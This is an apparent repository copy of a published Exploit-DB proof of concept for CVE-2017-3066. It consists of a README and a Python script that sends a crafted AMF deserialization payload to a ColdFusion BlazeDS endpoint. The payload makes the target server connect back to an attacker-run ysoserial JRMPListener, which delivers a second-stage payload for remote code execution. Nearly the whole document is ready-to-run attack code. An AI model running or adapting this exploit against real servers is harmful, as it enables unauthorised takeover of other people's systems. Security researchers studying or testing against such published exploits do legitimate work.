├── README.md
└── cf_blazeds_des.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Adobe Coldfusion BlazeDS Java Object Deserialization RCE
 2 | 
 3 | Exploit-DB: https://www.exploit-db.com/exploits/43993/
 4 | 
 5 | Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
 6 | 
 7 | Date: February 6, 2018
 8 | 
 9 | Exploit Author: Faisal Tameesh (@DreadSystems)
10 | 
11 | Company: Depth Security (https://depthsecurity.com)
12 | 
13 | Version: Adobe Coldfusion (11.0.03.292866)
14 | 
15 | Tested On: Windows 10 Enterprise (10.0.15063)
16 | 
17 | CVE: CVE-2017-3066
18 | 
19 | Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
20 | 
21 | Category: remote
22 | 
23 | Notes:
24 | This is a two-stage deserialization exploit. The code below is the first stage.
25 | You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
26 | After firing this exploit, and once the target server connects back, 
27 | JRMPListener will deliver the secondary payload for RCE.
28 | 


--------------------------------------------------------------------------------
/cf_blazeds_des.py:
--------------------------------------------------------------------------------
 1 | # Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
 2 | # Date: February 6, 2018
 3 | # Exploit Author: Faisal Tameesh (@DreadSystems)
 4 | # Company: Depth Security (https://depthsecurity.com)
 5 | # Version: Adobe Coldfusion (11.0.03.292866)
 6 | # Tested On: Windows 10 Enterprise (10.0.15063)
 7 | # CVE: CVE-2017-3066
 8 | # Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
 9 | # Category: remote
10 | 
11 | # Notes:
12 | # This is a two-stage deserialization exploit. The code below is the first stage.
13 | # You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
14 | # After firing this exploit, and once the target server connects back, 
15 | # JRMPListener will deliver the secondary payload for RCE.
16 | 
17 | import struct
18 | import sys
19 | import requests
20 | 
21 | if len(sys.argv) != 5:
22 |     print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
23 |     quit()
24 | 
25 | target_IP = sys.argv[1]
26 | target_port = sys.argv[2]
27 | callback_IP = sys.argv[3]
28 | callback_port = sys.argv[4]
29 | 
30 | amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
31 |               '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
32 |               struct.pack('>I', int(callback_port)) + \
33 |               '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
34 | 
35 | url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
36 | headers = {'Content-Type': 'application/x-amf'}
37 | response = requests.post(url, headers=headers, data=amf_payload, verify=False)
38 | 
39 | 


--------------------------------------------------------------------------------